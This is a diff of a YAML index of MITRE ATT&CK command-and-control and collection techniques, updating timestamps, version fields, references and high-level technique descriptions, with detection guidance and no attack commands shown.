@@ -63223,7 +63694,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -63277,7 +63747,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -63310,7 +63779,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -63330,8 +63799,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -63369,7 +63836,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -63397,42 +63864,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -63441,17 +63888,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -63483,7 +63952,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -63500,8 +63969,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -63521,7 +63988,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -63544,8 +64011,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -63570,7 +64035,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -63595,8 +64060,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -63661,7 +64124,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -63685,7 +64147,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -63710,21 +64172,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -63743,7 +64220,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -63757,6 +64234,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -63770,7 +64252,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests:
     - name: Psiphon
@@ -63857,7 +64338,7 @@ command-and-control:
         elevation_required: false
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -63907,11 +64388,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -63920,20 +64400,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -63958,17 +64438,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests:
     - name: Testing usage of uncommonly used port with PowerShell
@@ -64045,7 +64524,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests:
     - name: OpenSSL C2
@@ -64109,7 +64587,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -64146,8 +64624,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -64201,7 +64677,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -64273,7 +64748,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests:
     - name: ICMP C2
@@ -64361,28 +64835,8 @@ command-and-control:
         name: powershell
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -64390,23 +64844,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -64453,7 +64945,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -64513,7 +65004,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -64545,7 +65035,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -64571,8 +65061,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -64639,7 +65127,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests:
     - name: Malicious User Agents - Powershell
@@ -64794,7 +65281,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests:
     - name: certutil download (urlcache)
@@ -65890,7 +66376,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -65914,7 +66399,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -65937,8 +66422,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests:
     - name: Steganographic Tarball Embedding
@@ -66111,7 +66594,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -66131,8 +66614,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -66186,7 +66667,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests:
     - name: portproxy reg key
@@ -66244,7 +66724,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -66270,8 +66750,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -66325,7 +66803,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -66401,7 +66878,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests:
     - name: Compress Data for Exfiltration With Rar
@@ -66724,7 +67200,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests:
     - name: Windows Screencapture
@@ -66892,7 +67367,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -66971,7 +67445,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
